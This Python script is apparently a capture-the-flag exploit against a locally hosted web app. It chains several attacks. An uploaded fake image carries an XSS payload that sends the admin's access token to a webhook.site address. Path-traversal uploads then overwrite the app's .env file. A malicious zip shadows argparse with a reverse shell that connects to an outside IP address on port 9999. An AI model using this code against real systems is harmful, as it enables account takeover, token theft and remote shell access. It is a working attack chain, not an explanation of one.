import math
import textwrap
import requests
import json
import random
import string
import os
import shutil

URL = "http://127.0.0.1:8000/"

def create_ppm_from_payload(payload: str | bytes, width: int = 256):
    if isinstance(payload, str):
        payload = payload.encode('utf-8')

    payload_len = len(payload)

    # 填充 payload 使其长度为 3 的倍数
    pixel_padding = (3 - (payload_len % 3)) % 3
    payload += b'\x00' * pixel_padding
    num_color_values = len(payload)
    num_pixels = num_color_values // 3

    # 计算高度
    height = math.ceil(num_pixels / width)

    # 计算头部声明的总像素数
    declared_pixels = width * height
    # 计算头部声明的总颜色值数
    declared_color_values = declared_pixels * 3

    # 计算我们需要补充多少个 "0" 来填满整个图像矩形
    padding_values_needed = declared_color_values - num_color_values

    # 将 payload 字节流转换为十进制数字字符串列表
    pixel_values_str_payload = [str(byte_val) for byte_val in payload]

    # 添加填充的 "0"
    padding_list = ['0'] * padding_values_needed
    pixel_values_str = padding_list + pixel_values_str_payload

    # 构建 PPM 文件内容
    ppm_header = f"P3\n{width} {height}\n255\n"

    pixel_data_str = " ".join(pixel_values_str)
    wrapped_pixel_data = textwrap.fill(pixel_data_str, width=70)

    ppm_content = ppm_header + wrapped_pixel_data + "\n"
    return ppm_content

def double_html(s: str):
    return s.replace('/',"&#47;").replace('#',"&#35;")

def register_user(username: str, password: str):
    register_url = f"{URL}api/register/"

    payload = {
        'username': username,
        'password': password
    }

    headers = {
        'Content-Type': 'application/json'
    }

    print(f"[*] Attempting to register user '{username}'...")

    try:
        response = requests.post(register_url, headers=headers, json=payload)

        if response.status_code == 201:
            print(f"[+] User '{username}' registered successfully!")
            return True
        else:
            print(f"[-] Registration failed. Status: {response.status_code}")
            try:
                print(f"[-] Error: {response.json()}")
            except json.JSONDecodeError:
                print(f"[-] Error: {response.text}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[!] An error occurred during registration: {e}")
        return False


def login(username: str, password: str):
    login_url = f"{URL}api/token/"

    payload = {
        'username': username,
        'password': password
    }

    headers = {
        'Content-Type': 'application/json'
    }

    print(f"[*] Attempting to log in as '{username}'...")

    try:
        response = requests.post(login_url, headers=headers, json=payload)

        if response.status_code == 200:
            tokens = response.json()
            access_token = tokens.get('access')
            if access_token:
                print("[+] Login successful. Access Token obtained.")
                return access_token
            else:
                print("[-] Login successful, but no access token found in response.")
                return None
        else:
            print(f"[-] Login failed. Status: {response.status_code}")
            try:
                print(f"[-] Error: {response.json()}")
            except json.JSONDecodeError:
                print(f"[-] Error: {response.text}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[!] An error occurred during login: {e}")
        return None


def update_avatar(
        token: str,
        filename: str,
        file_content: str,
        content_type: str,
):
    headers = {
        'Authorization': f'Bearer {token}',
    }
    file_content = file_content.encode('utf-8')
    files = {
        'avatar': (filename, file_content, content_type)
    }

    try:
        # 4. 发送 PATCH 请求
        print(f"[*] Filename in payload: {filename}")

        response = requests.patch(
            f"{URL}api/me/",
            headers=headers,
            files=files,
            verify=False
        )

        print(f"\n[*] Response Status Code: {response.status_code}")
        print("[*] Response Headers:")
        for key, value in response.headers.items():
            print(f"    {key}: {value}")

        print("[*] Response Body:")
        try:
            print(response.json())
        except requests.exceptions.JSONDecodeError:
            print(response.text)

        return response

    except requests.exceptions.RequestException as e:
        print(f"\n[!] An error occurred: {e}")
        return None

def upload_file_once(
        filename: str,
        payload: str,
        content_type: str = "image/x-portable-pixmap",
):
    random_suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
    test_username = f"attacker_{random_suffix}"
    test_password = "password123"

    if not register_user(test_username, test_password):
        print("\n[!] Exiting script because registration failed.")
        exit(1)

    user_token = login(test_username, test_password)
    file_content = create_ppm_from_payload(payload, width=32)
    update_avatar(user_token, filename, file_content, content_type)


def admin_upload_once(
        filename: str,
        payload: str | bytes,
        content_type: str = "image/x-portable-pixmap",
        user_token: str = ""
):
    admin_username = "admin"
    admin_password = "123456"
    if user_token == "":
        print("\n[!] admin token not provided, using default username & password.")
        user_token = login(admin_username, admin_password)

    file_content = create_ppm_from_payload(payload, width=32)
    filename = f"../../..{filename}"
    filename = double_html(filename)
    update_avatar(user_token, filename, file_content, content_type)


# import argparse
def create_attack_zip(output_filename: str = "attack.zip"):
    payload = f"""
import os
import pty
import socket
lhost = "124.70.132.209"
lport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
"""

    # --- 2. 创建临时目录结构 ---
    temp_dir = "temp_zip_payload"
    if os.path.exists(temp_dir):
        shutil.rmtree(temp_dir)  # 清理旧的临时目录
    os.makedirs(temp_dir)

    try:
        with open(os.path.join(temp_dir, "__init__.py"), "w") as f:
            pass
        filepath = os.path.join(temp_dir, "argparse.py")
        archive_path_prefix = ""

        with open(filepath, "w") as f:
            f.write(payload)

        shutil.make_archive(
            base_name=output_filename.replace('.zip', ''),
            format='zip',
            root_dir=temp_dir,
            base_dir=archive_path_prefix
        )

        print(f"成功创建恶意 ZIP 文件: {output_filename}")

    finally:
        if os.path.exists(temp_dir):
            shutil.rmtree(temp_dir)



flag = 1
webhook_url = "https://webhook.site/21691a12-5977-4c23-9a61-44b04704a71a"

if flag == 1:
    upload_file_once('test.sse', '\n\ndata: {"id": 1, "role": "assistant", "content": "<img src=x onerror=\\"location.href = \''+webhook_url+'/\'+window.localStorage.access_token\\">", "is_html": true, "created_at": "2025-10-17T12:20:44.128236Z"}\n\ndata: [DONE]\n\n', )
    xss_uri = "/shared/..%2F..%2Fuploads%2Favatars%2Ftest.sse"
    payload = {
        "uri": xss_uri
    }
    response = requests.post(URL+"api/report/", json=payload)
    response.raise_for_status()
    print(f"    Response JSON: {response.json()}")

else:
    # 填写XSS获得的admin JWT
    admin_JWT = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0b2tlbl90eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzYxMDU4MTUzLCJpYXQiOjE3NjEwNTQ1NTMsImp0aSI6IjJmMDJjZmYwMjRjOTRkMmNiNDQ4NzFhMmViMjc3ZjJmIiwidXNlcl9pZCI6IjIifQ.QLwcSRRq7fvks8ZuWjc6m-95k_WkAW4dzaho_PaC9zY"
    
    headers = {
        'Authorization': f'Bearer {admin_JWT}',
    }
    response = requests.get(URL + "api/flag/", headers=headers)
    print(f"\n[*] Flag1: {response.text}\n")

    create_attack_zip('attack.zip')

    admin_upload_once('/app/.env', '\nPYTHONPATH=/app/attack.zip\n', "image/x-portable-pixmap", admin_JWT)

    with open('attack.zip', 'rb') as f:
        zip_payload = f.read()
    admin_upload_once('/app/attack.zip', zip_payload, "image/x-portable-pixmap", admin_JWT)


    # 触发worker进程重启
    for i in range(50):
        requests.get(URL)

    print("\n[*] Finishing sending requests.")
    import time
    time.sleep(5)

    # 触发zipimport
    payload = {
        "uri": "/"
    }
    response = requests.post(URL + "api/report/", json=payload)